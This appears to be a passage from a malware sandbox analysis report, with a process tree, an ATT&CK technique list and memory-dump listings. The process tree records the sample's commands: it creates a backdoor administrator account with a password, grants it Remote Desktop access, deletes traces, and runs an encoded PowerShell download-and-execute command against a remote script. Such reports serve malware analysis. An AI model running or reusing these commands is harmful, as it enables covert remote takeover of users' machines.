  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3096
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3056
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:3736
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2284
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:660

C:\Users\Admin\AppData\Local\Temp\971C.exe
C:\Users\Admin\AppData\Local\Temp\971C.exe
1⤵
- Executes dropped EXE
PID:3212
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 960
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
  PID:3792

C:\Users\Admin\AppData\Local\Temp\A527.exe
C:\Users\Admin\AppData\Local\Temp\A527.exe
1⤵
- Executes dropped EXE
PID:3988

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3500
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:1072

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 39lXC91r /add
1⤵
- Suspicious use of WriteProcessMemory
PID:3848
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 39lXC91r /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 39lXC91r /add
    3⤵
    PID:3396

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2056
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:2372

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4056
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:844
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
    3⤵
    PID:2328

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:3200
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:2020

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3600

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 39lXC91r
1⤵
PID:3788
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 user WgaUtilAcc 39lXC91r
  2⤵
  PID:1512

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 39lXC91r
1⤵
PID:1336

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2196
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Modifies data under HKEY_USERS
  PID:3036

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:4036
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  PID:3976

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1972
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    PID:2444

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1272-134-0x0000024E23E90000-0x0000024E23E91000-memory.dmp

Filesize
4KB

Download
memory/1272-157-0x0000024E23ED8000-0x0000024E23ED9000-memory.dmp

Filesize
4KB

Download
memory/1272-139-0x0000024E0B850000-0x0000024E0B852000-memory.dmp

Filesize
8KB

Download
memory/1272-143-0x0000024E23ED0000-0x0000024E23ED2000-memory.dmp

Filesize
8KB

Download
memory/1272-144-0x0000024E23ED3000-0x0000024E23ED5000-memory.dmp

Filesize
8KB

Download
memory/1272-136-0x0000024E0B850000-0x0000024E0B852000-memory.dmp

Filesize
8KB

Download
memory/1272-135-0x0000024E0B850000-0x0000024E0B852000-memory.dmp

Filesize
8KB

Download
memory/1272-133-0x0000024E0B850000-0x0000024E0B852000-memory.dmp

Filesize
8KB

Download
memory/1272-132-0x0000024E0B850000-0x0000024E0B852000-memory.dmp

Filesize
8KB

Download
memory/1272-131-0x0000024E0B850000-0x0000024E0B852000-memory.dmp

Filesize
8KB

Download
memory/1272-161-0x0000024E25380000-0x0000024E25381000-memory.dmp

Filesize
4KB

Download
memory/1272-130-0x0000024E0B850000-0x0000024E0B852000-memory.dmp

Filesize
8KB

Download
memory/1272-152-0x0000024E24990000-0x0000024E24991000-memory.dmp

Filesize
4KB

Download
memory/1272-129-0x0000024E0B850000-0x0000024E0B852000-memory.dmp

Filesize
8KB

Download
memory/1272-154-0x0000024E23ED6000-0x0000024E23ED8000-memory.dmp

Filesize
8KB

Download
memory/1272-137-0x0000024E249F0000-0x0000024E249F1000-memory.dmp

Filesize
4KB

Download
memory/1272-160-0x0000024E24FF0000-0x0000024E24FF1000-memory.dmp

Filesize
4KB

Download
memory/1588-118-0x00000000008B0000-0x00000000008C6000-memory.dmp

Filesize
88KB

Download
memory/1644-239-0x00000222F7E56000-0x00000222F7E58000-memory.dmp

Filesize
8KB

Download
memory/1644-236-0x00000222F7E53000-0x00000222F7E55000-memory.dmp

Filesize
8KB

Download
memory/1644-234-0x00000222F7E50000-0x00000222F7E52000-memory.dmp

Filesize
8KB

Download
memory/1644-276-0x00000222F7E58000-0x00000222F7E5A000-memory.dmp

Filesize
8KB

Download
memory/2052-122-0x0000015AE22D0000-0x0000015AE26CF000-memory.dmp

Filesize
4.0MB

Download
memory/2052-125-0x0000015AE1EB3000-0x0000015AE1EB5000-memory.dmp

Filesize
8KB

Download
memory/2052-124-0x0000015AE1EB0000-0x0000015AE1EB2000-memory.dmp

Filesize
8KB

Download
memory/2052-126-0x0000015AE1EB5000-0x0000015AE1EB6000-memory.dmp

Filesize
4KB

Download
memory/2052-127-0x0000015AE1EB6000-0x0000015AE1EB7000-memory.dmp

Filesize
4KB

Download
memory/2196-278-0x000001C8726E3000-0x000001C8726E5000-memory.dmp

Filesize
8KB

Download
memory/2196-293-0x000001C8726E6000-0x000001C8726E8000-memory.dmp

Filesize
8KB

Download
memory/2196-317-0x000001C8726E8000-0x000001C8726EA000-memory.dmp

Filesize
8KB

Download
memory/2196-277-0x000001C8726E0000-0x000001C8726E2000-memory.dmp

Filesize
8KB

Download
memory/2384-116-0x0000000002F10000-0x000000000305A000-memory.dmp

Filesize
1.3MB

Download
memory/2384-117-0x0000000000400000-0x0000000002F09000-memory.dmp

Filesize
43.0MB

Download
memory/2384-115-0x0000000003179000-0x0000000003182000-memory.dmp

Filesize
36KB

Download
memory/2444-459-0x000001F8FE9F8000-0x000001F8FE9F9000-memory.dmp

Filesize
4KB

Download
memory/2444-425-0x000001F8FE9F0000-0x000001F8FE9F2000-memory.dmp

Filesize
8KB

Download
memory/2444-427-0x000001F8FE9F3000-0x000001F8FE9F5000-memory.dmp

Filesize
8KB

Download
memory/2444-433-0x000001F8FE9F6000-0x000001F8FE9F8000-memory.dmp

Filesize
8KB

Download
memory/3212-275-0x0000000000400000-0x0000000002F4F000-memory.dmp

Filesize
43.3MB

Download
memory/3212-260-0x00000000030A0000-0x00000000031EA000-memory.dmp

Filesize
1.3MB

Download
memory/3212-185-0x00000000032A9000-0x00000000032F8000-memory.dmp

Filesize
316KB

Download
memory/3552-189-0x0000021B8FBD0000-0x0000021B8FBD2000-memory.dmp

Filesize
8KB

Download
memory/3552-186-0x0000021B8FBD0000-0x0000021B8FBD2000-memory.dmp

Filesize
8KB

Download
memory/3552-177-0x0000021BA9C23000-0x0000021BA9C25000-memory.dmp

Filesize
8KB

Download
memory/3552-178-0x0000021B8FBD0000-0x0000021B8FBD2000-memory.dmp

Filesize
8KB

Download
memory/3552-169-0x0000021B8FBD0000-0x0000021B8FBD2000-memory.dmp

Filesize
8KB

Download
memory/3552-180-0x0000021B8FBD0000-0x0000021B8FBD2000-memory.dmp

Filesize
8KB

Download
memory/3552-170-0x0000021B8FBD0000-0x0000021B8FBD2000-memory.dmp

Filesize
8KB

Download
memory/3552-171-0x0000021B8FBD0000-0x0000021B8FBD2000-memory.dmp

Filesize
8KB

Download
memory/3552-172-0x0000021B8FBD0000-0x0000021B8FBD2000-memory.dmp

Filesize
8KB

Download
memory/3552-173-0x0000021B8FBD0000-0x0000021B8FBD2000-memory.dmp

Filesize
8KB

Download
memory/3552-175-0x0000021B8FBD0000-0x0000021B8FBD2000-memory.dmp

Filesize
8KB

Download
memory/3552-176-0x0000021BA9C20000-0x0000021BA9C22000-memory.dmp

Filesize
8KB

Download
memory/3552-219-0x0000021BA9C28000-0x0000021BA9C2A000-memory.dmp

Filesize
8KB

Download
memory/3552-203-0x0000021BA9C26000-0x0000021BA9C28000-memory.dmp

Filesize
8KB

Download
memory/3552-188-0x0000021B8FBD0000-0x0000021B8FBD2000-memory.dmp

Filesize
8KB

Download
memory/3552-181-0x0000021B8FBD0000-0x0000021B8FBD2000-memory.dmp

Filesize
8KB

Download
memory/3988-319-0x0000000002F30000-0x000000000307A000-memory.dmp

Filesize
1.3MB

Download
memory/3988-320-0x0000000000400000-0x0000000002F23000-memory.dmp

Filesize
43.1MB

Download
memory/3988-332-0x0000000004F50000-0x0000000004F51000-memory.dmp

Filesize
4KB

Download
memory/3988-334-0x0000000004F53000-0x0000000004F54000-memory.dmp

Filesize
4KB

Download
memory/3988-333-0x0000000004F52000-0x0000000004F53000-memory.dmp

Filesize
4KB

Download
memory/3988-338-0x0000000004F54000-0x0000000004F56000-memory.dmp

Filesize
8KB

Download